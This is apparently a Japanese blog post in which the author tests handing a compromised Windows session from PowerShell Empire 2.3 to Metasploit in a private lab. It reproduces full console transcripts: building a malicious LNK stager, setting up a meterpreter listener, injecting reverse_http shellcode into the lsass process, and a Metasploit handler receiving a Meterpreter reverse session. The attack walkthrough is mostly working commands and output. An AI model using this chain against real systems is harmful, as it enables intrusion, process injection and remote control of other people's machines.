EMPIREで侵入後、セッションを張ったPCからserverに侵入したい。
実際はキーロガー等、地道にやっていくんだろうけど、DEMOの場合、脆弱性突いてすぐに侵入する方がかっこ良い。
問題は、侵入したwindowsPCでtoolが使えるかどうか。
使用できるtoolの幅を広げるために、EMPIREからmetasploitへバトンを渡せるようにする検証をやってみた。
はまりポイントはmetasploitのバージョンだった。
4.16.13だと、セッション渡したとたんに死ぬ現象が発生。4.16.26にverupすると解消された。
ちなみにEMPIREのバージョンは2.3。
まずは、いつも通りEMPIREとセッションを張る
(Empire: listeners) > (Empire: stager/windows/launcher_lnk) > execute [*] Stager output written out to: clickme.lnk (Empire: stager/windows/launcher_lnk) > [+] Initial agent 4SVP6M9W from 10.0.2.5 now active (Slack) (Empire: stager/windows/launcher_lnk) > agents [*] Active agents: Name Lang Internal IP Machine Name Username Process Delay Last Seen --------- ---- ----------- ------------ --------- ------- ----- -------------------- 4SVP6M9W ps 10.0.2.5 OSAKANA *osakana/n-lab powershell/2800 5/0.0 2018-01-20 11:47:28 (Empire: agents) > rename 4SVP6M9W WIN7 (Empire: agents) > interact WIN7 (Empire: WIN7) > back
次に、もうひとつlistenerを作成する。名前は”change-metasp”にしてみる。
ここでlistenerをmetasploitモードにて設定することで、meterpreterへトスできる
(Empire: listeners) > uselistener meterpreter (Empire: listeners/meterpreter) > set Name change-metasp (Empire: listeners/meterpreter) > set Port 8000 (Empire: listeners/meterpreter) > info Name: Meterpreter Category: client_server Authors: @harmj0y Description: Starts a 'foreign' http[s] Meterpreter listener. Meterpreter Options: Name Required Value Description ---- -------- ------- ----------- Host True http://10.0.2.15:8000 Hostname/IP for staging. Name True change-metasp Name for the listener. Port True 8000 Port for the listener. (Empire: listeners/meterpreter) > execute [*] Starting listener 'change-metasp' [+] Listener successfully started!
次は、meterpreterのインジェクション先を指定する
(Empire: listeners/http) > agents [*] Active agents: Name Lang Internal IP Machine Name Username Process Delay Last Seen --------- ---- ----------- ------------ --------- ------- ----- -------------------- A21TR6ZE ps 10.0.2.5 OSAKANA *osakana\n-lab powershell/1068 5/0.0 2018-01-19 21:46:08 (Empire: agents) > interact A21TR6ZE (Empire: A21TR6ZE) > getpid (Empire: A21TR6ZE) > Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 379 32 59524 69324 4.02 1068 1 powershell (Empire: A21TR6ZE) > ps (Empire: A21TR6ZE) > ProcessName PID Arch UserName MemUsage ----------- --- ---- -------- -------- Idle 0 x64 N/A 0.02 MB System 4 x64 N/A 0.74 MB smss 256 x64 NT AUTHORITY\SYSTEM 1.05 MB svchost 276 x64 NT AUTHORITY\LOCAL SERVICE 14.74 MB csrss 332 x64 NT AUTHORITY\SYSTEM 5.45 MB csrss 368 x64 NT AUTHORITY\SYSTEM 12.19 MB wininit 376 x64 NT AUTHORITY\SYSTEM 5.49 MB winlogon 404 x64 NT AUTHORITY\SYSTEM 7.71 MB services 464 x64 NT AUTHORITY\SYSTEM 8.77 MB lsass 472 x64 NT AUTHORITY\SYSTEM 10.38 MB svchost 476 x64 NT AUTHORITY\NETWORK SERVICE 15.84 MB powershell 1068 x64 osakana\n-lab 71.18 MB (Empire: A21TR6ZE) > injectshellcode change-metasp 472 (Empire: powershell/code_execution/invoke_shellcode) >
“change-metasp”がプロセス472にインジェクションするよーという設定info
(Empire: powershell/code_execution/invoke_shellcode) > info Name: Invoke-Shellcode Module: powershell/code_execution/invoke_shellcode NeedsAdmin: False OpsecSafe: True Language: powershell MinLanguageVersion: 2 Background: True OutputExtension: None Authors: @mattifestation Description: Uses PowerSploit's Invoke--Shellcode to inject shellcode into the process ID of your choosing or within the context of the running PowerShell process. If you're injecting custom shellcode, make sure it's in the correct format and matches the architecture of the process you're injecting into. Comments: http://www.exploit-monday.com https://github.com/mattifestat ion/PowerSploit/blob/master/CodeExecution/Invoke- Shellcode.ps1 Options: Name Required Value Description ---- -------- ------- ----------- ProcessID False 472 Process ID of the process you want to inject shellcode into. Lhost False Local host handler for the meterpreter shell. Agent True WIN7 Agent to run module on. Listener False change-metasp Meterpreter/Beacon listener name. Lport False Local port of the host handler. Shellcode False Custom shellcode to inject, 0xaa,0xab,... format. Payload False reverse_https Metasploit payload to inject (reverse_http[s]). (Empire: powershell/code_execution/invoke_shellcode) > set Payload reverse_http
ペイロードだけ、reverse_httpにしておく。同じマシンでmetasploitを立ち上げておくのでLhostは空にしておく。
次にmetasploitの設定。
msf > use exploit/multi/handler msf exploit(handler) > set paylad windows/meterpreter/reverse_http paylad => windows/meterpreter/reverse_http msf exploit(handler) > set LHOST 10.0.2.15 LHOST => 10.0.2.15 msf exploit(handler) > set LPORT 8000 LPORT => 8000 msf exploit(handler) > setg exitonsession false exitonsession => false msf exploit(handler) > set Global ====== Name Value ---- ----- exitonsession false Module: multi/handler ===================== Name Value ---- ----- ContextInformationFile DisablePayloadHandler false EnableContextEncoding false ExitOnSession false LHOST 10.0.2.15 LPORT 8000 ListenerTimeout 0 VERBOSE false WORKSPACE paylad windows/meterpreter/reverse_http msf exploit(handler) > exploit -j [*] Exploit running as background job 0. [*] Started reverse TCP handler on 10.0.2.15:8000
EMPIREに戻り、実行する
(Empire: powershell/code_execution/invoke_shellcode) > execute Job started: 9C81LK
すると、metasploitとセッションが張られる
msf exploit(multi/handler) > [*] http://10.0.2.15:8000 handling request from 10.0.2.5; (UUID: 67ehyyi0) Staging x86 payload (180825 bytes) ... [*] Meterpreter session 1 opened (10.0.2.15:8000 -> 10.0.2.5:49375) at 2018-01-20 13:49:34 +0900 sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows 10.0.2.15:8000 -> 10.0.2.5:49375 (10.0.2.5) msf exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo
しかしだ、sysinfoなんてしらねーと怒られる。。なぜ・・